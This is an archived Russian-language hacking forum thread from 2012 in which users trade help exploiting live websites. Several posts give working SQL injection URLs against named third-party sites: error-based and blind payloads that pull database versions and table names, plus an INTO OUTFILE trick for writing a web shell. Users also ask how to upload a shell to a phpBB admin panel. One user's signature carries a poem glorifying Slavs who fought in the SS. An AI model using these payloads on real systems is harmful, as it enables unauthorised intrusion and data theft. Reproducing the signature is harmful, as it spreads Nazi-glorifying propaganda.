ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
17.05.2012, 02:15
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937
Репутация:
0
|
|
to foma2120
Больше данных, что за xss. Где, как, что показывает... Из Ваших слов ничего не понятно!
|
|
|
17.05.2012, 03:32
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от foma2120
foma2120 said:
Подскажите пожалуйста, что делать если введенную xss показывает просто как текст?
что делать? открыть учебник по кодингу, и курить очень долго =\
http://www.php.su/functions/?htmlspecialchars
|
|
|
|
18.05.2012, 18:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Такой вопросец, немогу чёт понять как разкрутить ету слепую скулю
так вроде норм
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//board.ugmk.info/?type=(substring(@@version,1,1)=5)[/COLOR][/COLOR]
а так ошибка
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//board.ugmk.info/?type=(ascii(substring(select+table_schema+from+information_schema.tables+limit+0,1),1,1)>0)[/COLOR][/COLOR]
чё ему там не нравится? |
|
|
|
18.05.2012, 19:30
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937
Репутация:
0
|
|
to qaz
Зачем слепая? Все отлично выводится! Выберайте как Вам удобнее...
Код:
Code:
http://board.ugmk.info/?b=1337350801+or+1+group+by+mid(version(),floor(rand(0)*2),64)+having+avg(0)--+or+1
Код:
Code:
http://board.ugmk.info/?b=1337350801+and+extractvalue(1,concat(0x3a,version()))--+
|
|
|
|
18.05.2012, 20:05
|
|
Guest
Сообщений: n/a
Провел на форуме:
5709
Репутация:
0
|
|
Как залить шелл в phpbb 2.0.21 ? Доступ в админку есть, sql injection и php инклуда на сайте нет.
|
|
|
|
18.05.2012, 20:13
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937
Репутация:
0
|
|
|
|
|
|
18.05.2012, 20:25
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Сообщение от qaz
qaz said:
Такой вопросец, немогу чёт понять как разкрутить ету слепую скулю
так вроде норм
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//board.ugmk.info/?type=(substring(@@version,1,1)=5)[/COLOR][/COLOR]
а так ошибка
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//board.ugmk.info/?type=(ascii(substring(select+table_schema+from+information_schema.tables+limit+0,1),1,1)>0)[/COLOR][/COLOR]
чё ему там не нравится? ответ прост, ты как минимум забыл добавить скобки
Сообщение от None
http://board.ugmk.info/?type=1+and+ascii(substring(
(
select%20table_name+from+information_schema.tables +limit+1,1),1,1)
)
>255%23
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|
|
18.05.2012, 23:35
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от None
http://www.ximicat.com/index.php?search=Na&razdel_poiska=forum&sortme=pos t_subject&start=1390
Помогите со скулёй, чёт ничего не выходит
|
|
|
|
18.05.2012, 23:42
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
Как минимум раскручивается инъекция в order by (sortme=post_subject)
|
|
|
|
19.05.2012, 00:56
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от qaz
qaz said:
Помогите со скулёй, чёт ничего не выходит
http://www.ximicat.com/index.php?search=Na&razdel_poiska=forum&sortme=pos t_subject&start=1390,1--+ - TRUE => скуля в LIMIT'e.
Такие скули можно раскрутить только если в запросе не присутствует order by.
В данной скуле Order by уже есть, т.ч. нет.
Или если у юзера есть file_priv то через такую скулю можно залиться:
limit=10,1 limit 1 into outfile '/path/filename.php' lines terminated by 'olololo'-- a
Но в другом параметре (sortme) можно скулю раскрутить через ErrorBased.
Там скуля в параметре order by.
http://www.ximicat.com/index.php?search=Na&razdel_poiska=forum&sortme=pos t_subject,(select+1+from+(select+count(0),concat(( select+version()),floor(rand(0)*2))+from+informati on_schema.tables+group+by+2+limit+1)a)--+
Duplicate entry ' 5.1.61-0+squeeze1-log1' for key 'group_key'
//offtop я хотел чтобы человек подумал хоть, а ты...(
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
